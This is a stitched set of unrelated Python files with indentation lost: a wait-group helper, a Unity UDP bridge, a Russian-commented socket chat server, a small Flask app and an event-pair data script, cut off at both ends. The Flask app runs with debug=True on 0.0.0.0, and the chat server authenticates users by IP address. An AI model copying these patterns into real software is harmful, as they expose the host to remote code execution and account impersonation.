self.cv.acquire()
self.wait_count.value += count
self.cv.release()
def done(self):
self.cv.acquire()
if self.wait_count.value > 0:
self.wait_count.value -= 1
if self.wait_count.value == 0:
self.cv.notify_all()
self.cv.release()
def wait(self):
self.cv.acquire()
while self.wait_count.value > 0:
self.cv.wait()
self.cv.release()
def sleep_and_done(condC, wc, time_to_sleep):
wg = WaitGroupProcess(condC, wc)
time.sleep(time_to_sleep)
wg.done()
print("Process called done")
if __name__ == '__main__':
wait_count = Value('i', 0, lock=False)
cv = Condition()
wait_group_process = WaitGroupProcess(cv, wait_count)
wait_group_process.add(3)
Process(target=sleep_and_done, args=(cv, wait_count, 2)).start()
Process(target=sleep_and_done, args=(cv, wait_count, 5)).start()
Process(target=sleep_and_done, args=(cv, wait_count, 7)).start()
wait_group_process.wait()
print("All processes complete")
|
UdpComms.py
|
# Created by Youssef Elashry to allow two-way communication between Python3 and Unity to send and receive strings
# Feel free to use this in your individual or commercial projects BUT make sure to reference me as: Two-way communication between Python 3 and Unity (C#) - Y. T. Elashry
# It would be appreciated if you send me how you have used this in your projects (e.g. Machine Learning) at youssef.elashry@gmail.com
# Use at your own risk
# Use under the Apache License 2.0
import io
from PIL import Image, ImageDraw
import numpy as np
import cv2 as cv
class UdpComms():
def __init__(self,udpIP,portTX,portRX,enableRX=False,suppressWarnings=True):
"""
Constructor
:param udpIP: Must be string e.g. "127.0.0.1"
:param portTX: integer number e.g. 8000. Port to transmit from, i.e. from Python to the other application
:param portRX: integer number e.g. 8001. Port to receive on, i.e. from the other application to Python
:param enableRX: When False you may only send from Python and not receive. If set to True a thread is created to enable receiving of data
:param suppressWarnings: Stop printing warnings if not connected to other application
"""
import socket
self.udpIP = udpIP
self.udpSendPort = portTX
self.udpRcvPort = portRX
self.enableRX = enableRX
self.suppressWarnings = suppressWarnings # when true warnings are suppressed
self.isDataReceived = False
self.dataRX = None
# Connect via UDP
self.udpSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # internet protocol, udp (DGRAM) socket
self.udpSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allows the address/port to be reused immediately instead of it being stuck in the TIME_WAIT state waiting for late packets to arrive.
self.udpSock.bind((udpIP, portRX))
# Create Receiving thread if required
if enableRX:
import threading
self.rxThread = threading.Thread(target=self.ReadUdpThreadFunc, daemon=True)
self.rxThread.start()
def __del__(self):
self.CloseSocket()
def CloseSocket(self):
# Function to close socket
self.udpSock.close()
def SendData(self, strToSend):
# Use this function to send string to C#
self.udpSock.sendto(bytes(strToSend,'utf-8'), (self.udpIP, self.udpSendPort))
def ReceiveData(self):
"""
Should not be called by user
Function BLOCKS until data is returned from C#. It then decodes the received bytes as an image and returns it as an OpenCV (BGR) array.
A warning/error is raised if:
- Warning: Not connected to C# application yet. Warning can be suppressed by setting suppressWarnings=True in the constructor
- Error: If the data receiving procedure or image decoding goes wrong
- Error: If the user attempts to use this without enabling RX
:return: returns None on failure or the received image (numpy array) on success
"""
if not self.enableRX: # if RX is not enabled, raise error
raise ValueError("Attempting to receive data without enabling this setting. Ensure this is enabled from the constructor")
data = None
try:
data, _ = self.udpSock.recvfrom(65536)
byteio = io.BytesIO(data)
img = Image.open(byteio)
img2 = img.convert('RGB')
opencv_img = np.array(img2)
data = opencv_img[:, :, ::-1].copy()
#cv.imwrite('str(name)' + '.jpg', opencv_img)
except WindowsError as e:
if e.winerror == 10054: # An error occurs if you try to receive before connecting to other application
if not self.suppressWarnings:
print("Are You connected to the other application? Connect to it!")
else:
pass
else:
raise ValueError("Unexpected Error. Are you sure that the received data can be converted to a string")
return data
def ReadUdpThreadFunc(self): # Should be called from thread
"""
This function should be called from a thread [Done automatically via constructor]
(import threading -> e.g. udpReceiveThread = threading.Thread(target=self.ReadUdpNonBlocking, daemon=True))
This function keeps looping through the BLOCKING ReceiveData function and sets self.dataRX when data is received and sets received flag
This function runs in the background and updates class variables to read data later
"""
self.isDataReceived = False # Initially nothing received
while True:
data = self.ReceiveData() # Blocks (in thread) until data is returned (OR MAYBE UNTIL SOME TIMEOUT AS WELL)
self.dataRX = data # Populate AFTER new data is received
self.isDataReceived = True
# When it reaches here, data received is available
def ReadReceivedData(self):
"""
This is the function that should be used to read received data
Checks if data has been received SINCE LAST CALL; if so it returns the received data and sets the flag to False (to avoid re-reading it)
data is None if nothing has been received
:return:
"""
data = None
if self.isDataReceived: # if data has been received
self.isDataReceived = False
data = self.dataRX
self.dataRX = None # Empty receive buffer
return data
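# Hedged usage sketch, comment only: the IP, ports and polling loop are assumptions for
# illustration; SendData and ReadReceivedData are the methods defined above, and the
# returned frame is the OpenCV BGR array produced by ReceiveData.
#
#   sock = UdpComms(udpIP="127.0.0.1", portTX=8000, portRX=8001, enableRX=True)
#   while True:
#       frame = sock.ReadReceivedData()   # None until a complete datagram has been decoded
#       if frame is not None:
#           cv.imshow("received", frame)
#           cv.waitKey(1)
#       sock.SendData("ack")              # strings go back to the Unity/C# side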
|
server.py
|
import json
import logging
import random
import socket
import threading
from typing import Dict, Union, Any
import sha3
from data_processing import DataProcessing
from server_validator import port_validation, check_port_open
END_MESSAGE_FLAG = "CRLF"
DEFAULT_PORT = 9090
# Logging settings
logging.basicConfig(
format="%(asctime)-15s [%(levelname)s] %(funcName)s: %(message)s",
handlers=[logging.FileHandler("./logs/server.log"), logging.StreamHandler()],
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def hash(password: str) -> str:
"""Хеширование данных"""
return sha3.sha3_224(password.encode("utf-8")).hexdigest()
class Server:
def __init__(self, port_number: int) -> None:
logging.info(f"Запуск сервера..")
self.port_number = port_number
self.sock = None
self.database = DataProcessing()
self.socket_init()
# Список авторизации
self.authenticated_list = []
# Список ip, которым надо пройти регистрацию
self.reg_list = []
# Список соединений, по которым рассылаются сообщения
self.connections_list = []
self.ip2username_dict = {}
logging.info(f"Сервер инициализировался, слушает порт {port_number}")
# Ожидаем новое соединение
while True:
# Новое соединение
conn, addr = self.sock.accept()
# Добавляем новое соединение
self.connections_list.append((conn, addr))
logging.info(f"Новое соединение от {addr[0]}")
t = threading.Thread(target=self.router, args=(conn, addr))
t.daemon = True
t.start()
def send_message(self, conn, data: Union[str, Dict[str, Any]], ip: str) -> None:
"""Отправка данных"""
data_text = data
if type(data) == dict:
data = json.dumps(data, ensure_ascii=False)
data = data.encode()
conn.send(data)
logging.info(f"Сообщение {data_text} было отправлено клиенту {ip}")
def socket_init(self):
"""Инициализация сокета"""
sock = socket.socket()
sock.bind(("", self.port_number))
sock.listen(0)
# Наш сокет
self.sock = sock
def message_logic(self, conn, client_ip):
"""
Получение сообщений
"""
data = ""
while True:
# Получаем данные и собираем их по кусочкам
chunk = conn.recv(1024)
data += chunk.decode()
# Если это конец сообщения, то значит, что мы все собрали и можем отдавать данные каждому соединению
if END_MESSAGE_FLAG in data:
username = self.ip2username_dict[client_ip]
logging.info(
f"Получили сообщение {data} от клиента {client_ip} ({username})"
)
data = {"username": username, "text": data}
# Рассылка по каждому соединению
logger.info(
f"Текущее кол-во подключений к серверу: {len(self.connections_list)}"
)
for connection in self.connections_list:
current_conn, current_ip = connection
try:
self.send_message(current_conn, data, current_ip)
# Если вдруг у нас появилсоь соедиение, которое уже неактивно
except BrokenPipeError:
continue
# Обнуляемся
data = ""
# Значит пришла только часть большого сообщения
else:
logger.info(f"Приняли часть данных от клиента {client_ip}: '{data}'")
# Если вообще ничего не пришло - это конец всего соединения
if not chunk:
break
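# Hedged sketch of the client side of this framing protocol (comment only). The host,
# port, password and message text are assumptions; the flow mirrors auth_logic and
# message_logic: send a JSON auth request first, then messages terminated by END_MESSAGE_FLAG.
#
#   import socket
#   client = socket.socket()
#   client.connect(("127.0.0.1", 9090))
#   client.send(json.dumps({"password": "secret"}).encode())     # handled by auth_logic
#   print(client.recv(1024).decode())                            # {"result": ...}
#   client.send(("hello everyone" + END_MESSAGE_FLAG).encode())  # framed chat message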
def reg_logic(self, conn, addr):
"""
Логика регистрации пользователя
"""
data = json.loads(conn.recv(1024).decode())
newuser_password, newuser_username = hash(data["password"]), data["username"]
newuser_ip = addr[0]
self.database.user_reg(newuser_ip, newuser_password, newuser_username)
logger.info(f"Клиент {newuser_ip} -> регистрация прошла успешно")
data = {"result": True}
if newuser_ip in self.reg_list:
self.reg_list.remove(newuser_ip)
logging.info(f"Удалили клиента {newuser_ip} из списка регистрации")
self.send_message(conn, data, newuser_ip)
logger.info(f"Клиент {newuser_ip}. Отправили данные о результате регистрации")
def auth_logic(self, conn, addr):
"""
Логика авторизации клиента
Запрос авторизации у нас априори меньше 1024, так что никакой цикл не запускаем
"""
user_password = hash(json.loads(conn.recv(1024).decode())["password"])
client_ip = addr[0]
# Проверяем на существование данных
auth_result, username = self.database.user_auth(client_ip, user_password)
# Если авторизация прошла успешно
if auth_result == 1:
logger.info(f"Клиент {client_ip} -> авторизация прошла успешно")
data = {"result": True, "body": {"username": username}}
if client_ip not in self.authenticated_list:
self.authenticated_list.append(client_ip)
self.ip2username_dict[client_ip] = username
logging.info(f"Добавили клиента {client_ip} в список авторизации")
# Если авторизация не удалась, но пользователь с таким ip существует
elif auth_result == 0:
logger.info(f"Клиент {client_ip} -> авторизация не удалась")
data = {"result": False, "description": "wrong auth"}
# Если пользователя с таким ip не существует, то необходима регистрация
else:
logger.info(
f"Клиент {client_ip} -> необходима предварительная регистрация в системе"
)
data = {"result": False, "description": "registration required"}
if client_ip not in self.reg_list:
self.reg_list.append(client_ip)
logging.info(f"Добавили клиента {client_ip} в список регистрации")
self.send_message(conn, data, client_ip)
logger.info(f"Клиент {client_ip}. Отправили данные о результате авторизации")
# Если была успешная авторизация - принимаем последующие сообщения от пользователя
if auth_result == 1:
self.message_logic(conn, client_ip)
def router(self, conn, addr):
"""
Роутинг в зависимости от авторизации клиента
"""
logger.info("Router работает в отдельном потоке!")
client_ip = addr[0]
# Если клиенту нужна авторизация
if client_ip in self.reg_list:
self.reg_logic(conn, addr)
# Если ip не авторизован - надо авторизовать
elif client_ip not in self.authenticated_list:
self.auth_logic(conn, addr)
# Если уже был авторизован
else:
self.message_logic(conn, client_ip)
logging.info(f"Отключение клиента {client_ip}")
self.connections_list.remove((conn, addr))
# Если клиент был в списке авторизации - удаляем его
if client_ip in self.authenticated_list:
self.authenticated_list.remove(client_ip)
print("Список соединений:")
print(self.connections_list)
logging.info(f"Удалили клиента {client_ip} из списка авторизации")
def __del__(self):
logging.info(f"Остановка сервера")
def main():
port_input = input("Enter the port number for the server -> ")
# Check whether the port is already in use
port_flag = port_validation(port_input, check_open=True)
if not port_flag:
# If the default port is already taken, look for a free one
if not check_port_open(DEFAULT_PORT):
print(
f"The default port {DEFAULT_PORT} is already in use! Picking a random port.."
)
stop_flag = False
while not stop_flag:
current_port = random.randint(49152, 65535)
print(f"Generated random port {current_port}")
stop_flag = check_port_open(current_port)
port_input = current_port
else:
port_input = DEFAULT_PORT
print(f"Falling back to the default port {port_input}")
server = Server(int(port_input))
if __name__ == "__main__":
main()
|
app.py
|
# import app
from flask import Flask, render_template, make_response, send_file
from flask_cors import CORS
# import custom helpers
from maplib import generate_embed
import loyaltylib as ll
app = Flask(__name__)
CORS(app)
# import declared routes
import frontenddata
@app.route('/ll')
def llfn():
ll.create_loyalty_account()
ll.retrieve_loyalty_account()
return make_response('', 204)  # return an empty response so Flask does not error on a None view result
@app.route('/map')
def map():
location = '850 FOLSOM ST, San Francisco, CA 94107'
addresslist = {'a' : generate_embed(location)}
return render_template('map.html', addresslist=addresslist)
@app.route('/cal')
def cal():
appoint = {
'stylist': 'Bob Nguyen',
'salon': 'Salon Bobby',
'event': 'Men\'s Haircut',
'location':'850 FOLSOM ST, San Francisco, CA 94107',
'starttime':'2020-06-23 08:00:00',
'endtime':'2020-06-23 08:45:00',
}
return render_template('cal.html', appoint=appoint)
# def loop_matcher(delay):
# while(True):
# print('Matcher Automatically Run')
# handle_matcher()
# #do expired status update here
# time.sleep(delay)
# Run Server
if __name__ == "__main__":
#matcher_delay = 3600 # 1 hour in seconds
#p = Process(target=loop_matcher, args=(matcher_delay,))
#p.start()
app.run(host = '0.0.0.0', debug=True, use_reloader=False)
#p.join()
|
populate_to_pairs.py
|
from StringIO import StringIO
from sets import Set
import glob
import timeit
import gc
import gzip
from random import randint
import random
import networkx as nx
from util_class import *
from multiprocessing import Process
import os
# use EventPair and candidate class
def get_context_surrounding(sentence, dependencies, context_flag2, event_cand1, event_cand2):# relation_type == ' ==> ' or ' <== ' or ' <==> '
if context_flag2 == "tree_path":
valid_index = []
event1_index = event_cand1.keyIndex
event2_index = event_cand2.keyIndex
local_context = []
sur_context = ""
G = nx.Graph()
pobj_dict = {}
for entity in dependencies[1:-1]:
words = entity.split()
head = words[0]
tail = words[2]
#if (head == event1_index and tail == event2_index) or (tail == event1_index and head == event2_index):
# return None, None
edge = (head, tail)
G.add_edge(*edge)
if words[1] == "pobj":
pobj_dict[head] = tail
if head in [event1_index, event2_index]:
local_context.append(tail)
elif tail in [event1_index, event2_index]:
local_context.append(head)
try:
path = nx.shortest_path(G, source = event1_index, target = event2_index)
except:
return None, None
additional_context = []
for entity in dependencies[1:-1]:
words = entity.split()
head = words[0]
tail = words[2]
if head in path and words[1] in ["prep", "pobj", "aux", "auxpass", "conj", "cc", "punct"]:
additional_context.append(tail)
if words[1] == "prep" and tail in pobj_dict:
additional_context.append(pobj_dict[tail])
elif tail in path and words[1] in ["prep", "pobj", "aux", "auxpass", "conj", "cc", "punct"]:
additional_context.append(head)
valid_index = list(set(path + local_context + additional_context))
valid_index = map(int, valid_index) # change string list to int list
valid_index.sort()
valid_index = map(str, valid_index)
valid_index = [i for i in valid_index if 0 < int(i) < len(sentence)]  # filter instead of removing while iterating
for i in valid_index:
#if sentence[ int(i) ] == 'after' or sentence[ int(i) ] == 'before':
# return None, None
sur_context += sentence[int(i) ] + ' '
return valid_index, sur_context
elif context_flag2 == "window":
num_words_in_between = 10
num_words_before_or_after = 5
valid_index = []
event1_index = int(event_cand1.keyIndex)
event2_index = int(event_cand2.keyIndex)
sur_context = ""
#if (event2_index - num_words_in_between/2 >=1 and event1_index +num_words_in_between/2 <= len(sentence) -1 ):
for i in range( max( 1, event1_index - num_words_before_or_after ), event1_index):
valid_index.append(i)
valid_index.append(event1_index)
if (event1_index + num_words_in_between/2 <= event2_index - num_words_in_between/2):
for i in range(event1_index + 1, event1_index + num_words_in_between/2+1):
valid_index.append(i)
for i in range(event2_index - num_words_in_between/2, event2_index):
valid_index.append(i)
else:
for i in range(event1_index + 1, event2_index):
valid_index.append(i)
valid_index.append(event2_index)
for i in range(event2_index + 1, min(len(sentence) - 1, event2_index + num_words_before_or_after) + 1):
valid_index.append(i)
for i in event_cand1.allIndex:
if not int(i) in valid_index:
valid_index.append( int (i) )
for i in event_cand2.allIndex :
if not int(i) in valid_index:
valid_index.append( int (i) )
valid_index.sort()
valid_index = map(str, valid_index)
valid_index = [i for i in valid_index if 0 < int(i) < len(sentence)]  # filter instead of removing while iterating
for i in valid_index:
#if sentence[ int(i) ] == 'after' or sentence[ int(i) ] == 'before':
# return None, None
sur_context += sentence[int (i) ] + ' '
return valid_index, sur_context
#else:
# return None, None
def machine_learning_set(input_f1, input_f2):
train_f = open(input_f1, 'r')
test_f = open(input_f2, 'r')
train_dict = {}
for each_line in train_f:
words = each_line.split()
e1 = ""
e2 = ""
relation = ""
relation_index = -1
end_index = -1
angle_brackets_count = 0
for i, word in enumerate(words[:-1]):
if word == "==>" or word == "<==":
relation_index = i
relation = word
continue
if word in ['<', '>']:
angle_brackets_count += 1
if angle_brackets_count == 4 and word.isdigit():
end_index = i
break
e1 = " ".join(words[:relation_index])
e2 = " ".join(words[relation_index+1 : end_index])
if relation == "==>":
train_dict[e1+ ' ' + e2] = "==>"
train_dict[e2+ ' ' + e1] = "<=="
if relation == "<==":
train_dict[e1+ ' ' + e2] = "<=="
train_dict[e2+ ' ' + e1] = "==>"
test_dict = {}
for each_line in test_f:
words = each_line.split()
e1 = ""
e2 = ""
relation = ""
relation_index = -1
end_index = -1
angle_brackets_count = 0
for i, word in enumerate (words[:-1]):
if word == "==>" or word == "<==" or word == "<==>":
relation = word
relation_index = i
continue
if word in ['<', '>']:
angle_brackets_count += 1
if angle_brackets_count == 4 and word.isdigit():
end_index = i
break
e1 = " ".join(words[:relation_index])
e2 = " ".join(words[relation_index+1 : end_index])
if e1 <= e2:
pair_instance = e1 + ' ' + e2
test_dict[pair_instance] = relation
else:
pair_instance = e2 + ' ' + e1
if relation == "<==>":
test_dict[pair_instance] = "<==>"
elif relation == "<==":
test_dict[pair_instance] = "==>"
elif relation == "==>":
test_dict[pair_instance] = "<=="
"""
for ele in train_dict:
print ele
print train_dict[ele]
raw_input("continue?")
"""
print "train_dict: ", len(train_dict)
print "test_dict: ", len(test_dict)
return train_dict, test_dict
def context_exclude_event_words(sentence, event_cand1, event_cand2, valid_index):
result = ""
for i in valid_index:
if not i in event_cand1.allIndex and not i in event_cand2.allIndex:
result += sentence[int(i)] + ' '
return result
#event_pairs_readable = {}
def get_highlight_sentence(sentence, event_cand1, event_cand2):
result_list = []
for i, word in enumerate(sentence):
if str(i) == event_cand1.keyIndex or str(i) == event_cand2.keyIndex:
result_list.append('['+ word +']')
elif str(i) in event_cand1.allIndex or str(i) in event_cand2.allIndex:
result_list.append('('+ word + ')')
else:
result_list.append(word)
return " ".join(result_list)
def reverse_relation(relation):
if relation == "<==>":
return "<==>"
elif relation == "<==":
return "==>"
else:
return "<=="
def populate(iteration_i, idx, gen_flag, context_flag2, input_f1, input_f2, File, other_ratio, final_test_classifier):
print File
#global train_after_before_count, train_other_count
train_after_before_count = 0
train_other_count = 0
train_dict, test_dict = machine_learning_set(input_f1, input_f2)
"""
for ele in train_dict:
print ele
raw_input("continue?")
"""
with_folder = "with_event_words/" + iteration_i + '/'
train_before_output = open(with_folder + 'train_before_pairs' + str(idx), 'w')
train_after_output = open(with_folder + 'train_after_pairs' + str(idx), 'w')
train_other_output = open(with_folder + 'train_other_pairs' + str(idx), 'w')
track_train_before_output = open(with_folder + 'track_train_before_pairs' + str(idx), 'w')
track_train_after_output = open(with_folder + 'track_train_after_pairs' + str(idx), 'w')
track_train_other_output = open(with_folder + 'track_train_other_pairs' + str(idx), 'w')
test_other_output = open(with_folder + 'test_other_pairs' + str(idx), 'w')
track_test_other_output = open(with_folder + 'track_test_other_pairs' + str(idx), 'w')
other_sentences = open(with_folder + 'other_pairs_sentences' + str(idx), 'w')
train_after_sentences = open(with_folder + 'train_after_pairs_sentences' + str(idx), 'w')
train_before_sentences = open(with_folder + 'train_before_pairs_sentences' + str(idx), 'w')
without_folder = "without_event_words/" + iteration_i + '/'
w_train_before_output = open(without_folder + 'train_before_pairs' + str(idx), 'w')
w_train_after_output = open(without_folder +'train_after_pairs' + str(idx), 'w')
w_train_other_output = open(without_folder +'train_other_pairs' + str(idx), 'w')
w_track_train_before_output = open(without_folder +'track_train_before_pairs' + str(idx), 'w')
w_track_train_after_output = open(without_folder +'track_train_after_pairs' + str(idx), 'w')
w_track_train_other_output = open(without_folder +'track_train_other_pairs' + str(idx), 'w')
w_test_other_output = open(without_folder +'test_other_pairs' + str(idx), 'w')
w_track_test_other_output = open(without_folder +'track_test_other_pairs' + str(idx), 'w')
lines_count = 0
sentence_count = 0
random.seed(1)
#other_ratio = 500
not_events = not_events_load("../dic/words_filter.txt")
lines = open(File, 'r')
for each_line in lines:
#if lines_count >= 500000:
# break
if each_line.startswith('#') or not each_line.strip():
continue
words = each_line.split()
if len(words) <=2:
continue
if (words[0] == '<words>'):
sentence = words
NERs = []
dependencies = []
event_candidate_list = []
affi_dict = {}
sentence_count += 1
continue
elif (words[0] == '<NERs>'):
NERs = words
continue
elif words[0] == '<dependencies>':
dependencies = each_line.split('|')
continue
elif (words[0] == '<events_index>'):
word_group_flag = 0
word_group_member_list = []
for word in words[1:]:
if word == '<':
word_group_flag = 1
word_group_member_list.append(word)
continue
if word_group_flag == 1 and word == '>':
word_group_flag = 0
word_group_member_list.append(word)
event_cand = Candidate(gen_flag, sentence, NERs, word_group_member_list)
event_candidate_list.append(event_cand)
word_group_member_list = []
continue
if word_group_flag == 1:
word_group_member_list.append(word)
continue
for index in range(0, len(event_candidate_list) ):
for second_index in range(index+1, len(event_candidate_list) ):
event1_index = int( event_candidate_list[index].keyIndex )
event2_index = int( event_candidate_list[second_index].keyIndex )
event1_key = event_candidate_list[index].keyword
event2_key = event_candidate_list[second_index].keyword
if abs(event1_index - event2_index) > 10 or abs(event1_index - event2_index) < 2:
continue
e1 = ""
e2 = ""
e1 = event_candidate_list[index].string
e2 = event_candidate_list[second_index].string
if e1 + ' ' + e2 in train_dict:
relation = train_dict[e1 + ' ' + e2]
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
exclude_event_words = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
if len(exclude_event_words.split()) < 6:
continue
if relation == "==>":
#train_before_output.write(sur_context + e1 + ' ' + e2 + '\n')
train_before_output.write(sur_context + '\n')
pair = e1 + ' ' + relation + ' ' + e2
w_train_before_output.write(exclude_event_words + '\n')
track_train_before_output.write( pair + '\n')
w_track_train_before_output.write(pair + '\n')
train_before_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
#event_pairs_readable[e1 + relation + e2] = readable_e1 + ' ' + relation + ' ' + readable_e2
if relation == "<==":
#train_after_output.write(sur_context + e1 + ' ' + e2 +'\n')
train_after_output.write(sur_context + '\n')
pair = e1 + ' ' + relation + ' ' + e2
w_train_after_output.write(exclude_event_words + '\n')
track_train_after_output.write(pair + '\n')
w_track_train_after_output.write(pair + '\n')
#event_pairs_readable[pair] = readable_e1 + ' ' + relation + ' ' + readable_e2
train_after_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
lines_count += 1
train_after_before_count += 1
elif e1 + ' ' + e2 in test_dict or e2 + ' ' + e1 in test_dict:
#if random.randint(0, 9) != 0:
# continue
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
exclude_event_words = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
#if len (exclude_event_words.split() ) < 8:
# continue
reverse_flag = 0
if e1 <= e2:
pair_instance = e1 + ' ' + e2
else:
reverse_flag = 1
pair_instance = e2 + ' ' + e1
relation = test_dict[pair_instance]
test_other_output.write(sur_context + '\n')
w_test_other_output.write(exclude_event_words + '\n')
if reverse_flag == 0:
track_test_other_output.write(e1 + ' ' + relation + ' ' + e2 + '\n')
w_track_test_other_output.write(e1 + ' ' + relation + ' ' + e2 + '\n')
else:
track_test_other_output.write(e1 + ' ' + reverse_relation(relation) + ' ' + e2 + '\n')
w_track_test_other_output.write(e1 + ' ' + reverse_relation(relation) + ' ' + e2 + '\n')
other_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
lines_count += 1
elif len(e1.split()) + len( e2.split()) >= 6:
random_number = random.randint(0, 20)
if random_number == 0:
if train_other_count > other_ratio * train_after_before_count:
continue
if other_sentence_filter(not_events, event1_key, event2_key) == True:
continue
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
sur_context_without_event = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
if len(sur_context_without_event.split()) < 6:
continue
#test_other_output.write(sur_context + e1 + ' ' + e2 +'\n')
train_other_output.write(sur_context + '\n')
w_train_other_output.write(sur_context_without_event + '\n')
track_train_other_output.write(e1 + ' <==> ' + e2 + '\n')
w_track_train_other_output.write(e1 + ' <==> ' + e2 + '\n')
lines_count += 1
train_other_count += 1
lines.close()
train_before_output.close()
train_after_output.close()
train_other_output.close()
track_train_before_output.close()
track_train_after_output.close()
track_train_other_output.close()
test_other_output.close()
track_test_other_output.close()
w_train_before_output.close()
w_train_after_output.close()
w_train_other_output.close()
w_track_train_before_output.close()
w_track_train_after_output.close()
w_track_train_other_output.close()
w_test_other_output.close()
w_track_test_other_output.close()
if final_test_classifier:
test_other_output = open(with_folder + 'test_other_pairs' + str(idx), 'w')
track_test_other_output = open(with_folder + 'track_test_other_pairs' + str(idx), 'w')
other_sentences = open(with_folder + 'other_pairs_sentences' + str(idx), 'w')
w_test_other_output = open(without_folder +'test_other_pairs' + str(idx), 'w')
w_track_test_other_output = open(without_folder +'track_test_other_pairs' + str(idx), 'w')
lines = open(File.replace("nyt", "wpb"), 'r')
for each_line in lines:
if each_line.startswith('#') or not each_line.strip():
continue
words = each_line.split()
if len(words) <=2:
continue
if (words[0] == '<words>'):
sentence = words
NERs = []
dependencies = []
event_candidate_list = []
affi_dict = {}
sentence_count += 1
continue
elif (words[0] == '<NERs>'):
NERs = words
continue
elif words[0] == '<dependencies>':
dependencies = each_line.split('|')
continue
elif (words[0] == '<events_index>'):
word_group_flag = 0
word_group_member_list = []
for word in words[1:]:
if word == '<':
word_group_flag = 1
word_group_member_list.append(word)
continue
if word_group_flag == 1 and word == '>':
word_group_flag = 0
word_group_member_list.append(word)
event_cand = Candidate(gen_flag, sentence, NERs, word_group_member_list)
event_candidate_list.append(event_cand)
word_group_member_list = []
continue
if word_group_flag == 1:
word_group_member_list.append(word)
continue
for index in range(0, len(event_candidate_list) ):
for second_index in range(index+1, len(event_candidate_list) ):
event1_index = int( event_candidate_list[index].keyIndex )
event2_index = int( event_candidate_list[second_index].keyIndex )
event1_key = event_candidate_list[index].keyword
event2_key = event_candidate_list[second_index].keyword
if abs(event1_index - event2_index) > 10 or abs(event1_index - event2_index) < 2:
continue
e1 = ""
e2 = ""
e1 = event_candidate_list[index].string
e2 = event_candidate_list[second_index].string
#elif e1 + ' ' + e2 in test_dict or e2 + ' ' + e1 in test_dict:
if other_sentence_filter(not_events, event1_key, event2_key) == True:
continue
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
exclude_event_words = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
test_other_output.write(sur_context + '\n')
w_test_other_output.write(exclude_event_words + '\n')
track_test_other_output.write(e1 + ' <==> ' + e2 + '\n')
w_track_test_other_output.write(e1 + ' <==> ' + e2 + '\n')
other_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
lines.close()
test_other_output.close()
track_test_other_output.close()
other_sentences.close()
w_test_other_output.close()
w_track_test_other_output.close()
print "sentence_count: ", sentence_count
print "lines_count: ", lines_count
def populate_to_pairs_main(iteration_i, gen_flag, context_flag2, input_f1, input_f2, other_ratio, final_test_classifier):
#for File in glob.glob("../../pre_process_sentence_context/pre_process_nyt_new_*"):
# populate(iteration_i, gen_flag, context_flag2, input_f1, input_f2, File, other_ratio)
processV = []
for idx in range(0, 10):
File = "../../pre_process_sentence_context/pre_process_nyt_new_" + str(idx)
processV.append(Process(target = populate, args = (iteration_i, idx, gen_flag, context_flag2, input_f1, input_f2, File, other_ratio, final_test_classifier,)))
for idx in range(0, 10):
processV[idx].start()
for idx in range(0, 10):
processV[idx].join()
# merge files
with_folder = "with_event_words/" + iteration_i + '/'
train_before_output = open(with_folder + 'train_before_pairs', 'w')
train_after_output = open(with_folder + 'train_after_pairs', 'w')
train_other_output = open(with_folder + 'train_other_pairs', 'w')
track_train_before_output = open(with_folder + 'track_train_before_pairs', 'w')
track_train_after_output = open(with_folder + 'track_train_after_pairs', 'w')
track_train_other_output = open(with_folder + 'track_train_other_pairs', 'w')
test_other_output = open(with_folder + 'test_other_pairs', 'w')
track_test_other_output = open(with_folder + 'track_test_other_pairs', 'w')
other_sentences = open(with_folder + 'other_pairs_sentences', 'w')
train_after_sentences = open(with_folder + 'train_after_pairs_sentences', 'w')
train_before_sentences = open(with_folder + 'train_before_pairs_sentences', 'w')
without_folder = "without_event_words/" + iteration_i + '/'
w_train_before_output = open(without_folder + 'train_before_pairs', 'w')
w_train_after_output = open(without_folder +'train_after_pairs', 'w')
w_train_other_output = open(without_folder +'train_other_pairs', 'w')
w_track_train_before_output = open(without_folder +'track_train_before_pairs', 'w')
w_track_train_after_output = open(without_folder +'track_train_after_pairs', 'w')
w_track_train_other_output = open(without_folder +'track_train_other_pairs', 'w')
w_test_other_output = open(without_folder +'test_other_pairs', 'w')
w_track_test_other_output = open(without_folder +'track_test_other_pairs', 'w')
for idx in range(0, 10):
with_folder = "with_event_words/" + iteration_i + '/'
f = open(with_folder + 'train_before_pairs' + str(idx), 'r')
train_before_output.write(f.read())
f.close()
f = open(with_folder + 'train_after_pairs' + str(idx), 'r')
train_after_output.write(f.read())
f.close()
f = open(with_folder + 'train_other_pairs' + str(idx), 'r')
train_other_output.write(f.read())
f.close()
f = open(with_folder + 'track_train_before_pairs' + str(idx), 'r')
track_train_before_output.write(f.read())
f.close()
f = open(with_folder + 'track_train_after_pairs' + str(idx), 'r')
track_train_after_output.write(f.read())
f.close()
f = open(with_folder + 'track_train_other_pairs' + str(idx), 'r')
track_train_other_output.write(f.read())
f.close()
f = open(with_folder + 'test_other_pairs' + str(idx), 'r')
test_other_output.write(f.read())
f.close()
f = open(with_folder + 'track_test_other_pairs' + str(idx), 'r')
track_test_other_output.write(f.read())
f.close()
f = open(with_folder + 'other_pairs_sentences' + str(idx), 'r')
other_sentences.write(f.read())
f.close()
f = open(with_folder + 'train_after_pairs_sentences' + str(idx), 'r')
train_after_sentences.write(f.read())
